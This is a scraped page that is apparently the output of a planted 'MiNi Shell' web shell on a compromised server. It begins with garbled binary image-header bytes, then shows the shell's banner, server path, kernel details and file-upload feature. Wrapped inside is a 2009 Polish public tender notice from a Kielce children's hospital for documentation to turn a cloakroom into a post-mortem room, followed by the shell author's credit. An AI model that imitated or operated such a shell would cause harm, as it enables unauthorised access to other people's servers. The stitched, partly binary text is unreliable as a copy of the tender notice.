JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090116/19043-N-2009.html

<p class="kh_header"><b>Kielce: Wykonanie dokumentacji do zmiany funkcji pomieszczenia Pawilon B -szatnia na pomieszczenie Post Mortem</b><br>
<b>Numer ogłoszenia: 19043 - 2009; data zamieszczenia: 16.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego , ul. Langiewicza 2, 25-381 Kielce, woj. świętokrzyskie, tel. (041) 361 58 17, faks (041) 361 58 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chok.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji do zmiany funkcji pomieszczenia Pawilon B -szatnia na pomieszczenie Post Mortem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia publicznego: Usługa
Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień 
( CPV)71 000000-8- usługi architektoniczne, budowlane, inżynieryjne i kontrolne; 71 221000-3-usługi architektoniczne w zakresie obiektów budowlanych.
Przedmiotem zamówienia jest wykonanie dokumentacji projektowej do zmiany  funkcji pomieszczenia Pawilon B- szatnia na pomieszczenie post mortem.
 Przedmiot zamówienia należy wykonać zgodnie  z wymaganiami i obowiązującymi w tym zakresie przepisami prawa. Oferent winien mieć doświadczenie w projektowaniu obiektów dla Służby Zdrowia.
2.Zakres przedmiotu zamówienia:
opracowanie projektu Budowlano- Wykonawczego, 
opracowanie zbioru specyfikacji technicznych wykonania i odbioru robót budowlanych,
opracowanie kompletu kosztorysów inwestorskich dla wszystkich rodzajów robót i instalacji( branża : elektryczna, sanitarna, wentylacja i klimatyzacja, projekty instalacyjne w branżach),
opracowanie kompletu przedmiarów robót,
informacja dotycząca bezpieczeństwa i ochrony zdrowia (bioz), gdy jest wymagana odrębnymi przepisami,
opracowanie  harmonogramu rzeczowo- finansowego dla realizowanego zadania,
inwentaryzacja pomieszczeń istniejących,
pozwolenie na budowę ( wraz z niezbędnymi uzgodnieniami)
3.Wymaga się, aby wykonawca zdobył wszystkie informacje, które mogą być       konieczne do przygotowania oferty oraz podpisania umowy.
 Przed sporządzeniem oferty Wykonawcy winni dokonać wizji lokalnej    miejsca  wykonania przedmiotu zamówienia.
4.Istniejąca dokumentacja techniczna do wglądu w Dziale Technicznym u kierownika działu: Tadeusza Śliwki- pawilon F pok. 3,4.
5.Szczegóły opracowania należy uzgadniać  na bieżąco z Działem Technicznym.
6.Całość dokumentacji powinna być przekazana w formie papierowej oraz elektronicznej ( w tym rysunki) na nośniku CD lub DVD umożliwiającej wyd identycznej kopii dokumentacji papierowej.
 Dokumentacja: techniczna wielobranżowa wraz ze specyfikacją techniczną  wykonania i odbioru robót   powinna być sporządzona w 4 egzemplarzach. 
Dokumentacja winna być wykonana zgodnie z wymaganiami i obowiązującymi   w tym zakresie przepisami prawa,  a w szczególności:
zgodnie z ustawą z dnia 07.07.1994r. Prawo budowlane ( tekst jedn. Dz. U.z 2006r. Nr.156, poz.1118 z późn. zm.), Polskimi Normami.
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego Dz.U.04.202.2072 z późn. zm.
Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym  Dz. U. z 2004r Nr.130, poz.1389 z późn. zm.
Rozporządzenie Ministra Zdrowia z dnia 10 listopada 2006r w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej Dz. U. Nr 213, poz 1568.
Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r w sprawie szczegółowego zakresu i formy projektu budowlanego  Dz. U. z dnia 10 marca 2003r Nr 120, poz.1133 z późn. zm.)
Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006r w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów ( Dz. U. z 2006r, Nr80, poz. 563)
Ustawą  Prawo zamówień publicznych z dnia 29 stycznia 2004r (Dz. U. z 29 listopada 2007r nr 223 , poz.1655 )..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Zamawiający udzieli zamówienia Wykonawcy, który spełni wymagania zawarte w ustawie i Specyfikacji Istotnych Warunków Zamówienia.
2.O udzielenie zamówienia mogą ubiegać  się Wykonawcy, którzy spełniają warunki określone w art.22 ust.1  pkt.1-4 ustawy, którzy:
a)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)Posiadają niezbędną wiedzę i doświadczenie : a)dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,b) przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy.
3. Zamawiający dokona oceny spełniania warunków na podstawie oświadczeń   i  dokumentów złożonych przez Wykonawcę na zasadzie spełnia lub nie spełnia wymaganego warunku.
4. Nie spełnienie chociażby jednego warunku, skutkować będzie     	wykluczeniem    Wykonawcy z postępowania/ odrzuceniem jego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy są zobowiązani złożyć następujące dokumenty i oświadczenia:
Wypełnioną i podpisaną ofertę według formularza stanowiącego załącznik  nr1 do niniejszej specyfikacji
Oświadczenie  Wykonawcy o spełnianiu warunków określonych w art.22 ust.1 oraz, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie   art.24 ustawy(według formularza oświadczenia stanowiącego załącznik nr  2 do niniejszej specyfikacji).
W przypadku  składania oferty wspólnej w/w dokument składa każdy z Wykonawców składających ofertę wspólną ( zgodnie z załącznikiem nr2)
oświadczenie z mocy art. 36 ust.4 Ustawy  Pzp  w sprawie podwykonawców -załącznik nr 3 do  niniejszej specyfikacji. W przypadku oferty wspólnej należy złożyć jedno oświadczenie.
oświadczenie w trybie art.44 ustawy- załącznik nr4 do niniejszej specyfikacji 
2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do  	wykonywania  określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 Ustawy z dnia 29 stycznia 2004r Pzp do 	oferty należy załączyć:
 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o   wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem   terminu składania ofert. w przypadku składania oferty wspólnej w/w dokumenty składa każdy z Wykonawców składających ofertę wspólną
aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt4-8, pkt.9 ustawy, wystawione nie wcześniej niż 6-miesięcy przed upływem terminu składania  ofert.
W przypadku  składania oferty wspólnej w/w dokument składa każdy z Wykonawców składających ofertę wspólną
3.  W celu potwierdzenia, że Wykonawca posiada  niezbędną wiedzę i  doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi  do wykonania zamówienia Zamawiający żąda:
Wykazu  realizacji przynajmniej dwóch wykonanych usług (prac o podobnym charakterze do przedmiotu zamówienia),  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te  zostały wykonane należycie.
Wykaz osób którymi dysponuje lub będzie  dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (zał. nr5),wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności(projektanci zespołu projektowego udokumentują przynależność do Izby Inżynierów Budownictwa oraz Izby Architektów RP oraz posiadane uprawnienia w zakresie prac objętych przedmiotem zamówienia. Projektanci posiadają min. 3-letnie doświadczenie po uzyskaniu uprawnień. Kserokopie uprawnień każdego z projektantów zespołu projektowego)
Pisemnego zobowiązania  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował.   
4. W celu potwierdzenia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda:
Informacji banku lub  spółdzielczej kasy oszczędnościowo- kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Oferenta , wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
Polisy, a w przypadku jej braku innego dokumentu potwierdzającego , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
5.Wykonawcy wspólnie ubiegający się o zamówienie  (o których mowa w art.23 ust.1) złożą wraz z ofertą   dokument  o ustanowieniu przez nich pełnomocnika ( lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy ( art. 141 ustawy).  Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała  wszystkich Wykonawców występujących wspólnie
Postanowienia SIWZ, dotyczące wykonawcy stosuje się odpowiednio do  	  wykonawców wspólnie ubiegających się o udzielenie zamówienia
6.  Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006r. Dz. U. Nr 87, poz. 605 oraz  Dz. U. Nr 188 poz. 1155). Wykonawca składa wszystkie dokumenty sporządzone w języku  obcym wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
7. W celu potwierdzenia, że oferowany przedmiot zamówienia odpowiada  wymaganiom określonym przez Zamawiającego Wykonawca winien :
dostarczyć ofertę, będącą oświadczeniem woli wykonawcy i oświadczenia, że przedmiot zamówienia jest wykonany zgodnie z obowiązującymi przepisami prawa.
pełnomocnictwo do podpisania oferty ( jeżeli dotyczy) podpisane przez osobę/ osoby figurujące w rejestrze handlowym lub innym dokumencie. Brak podpisu na ofercie lub podpisanie oferty przez osobę/y do tego nie upoważnioną/e będzie skutkowało odrzuceniem oferty na podstawie art. 89 ust.1 pkt.8 ustawy. Dokument pełnomocnika należy przedstawić w formie oryginału..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chok.kielce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego, ul. Langiewicza 2, 25-381 Kielce, Pawilon A, pokój nr 22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2009 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital Dziecięcy w Kielcach, ul. Langiewicza 2, 25-381 Kielce, Pawilon A, pokój nr 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com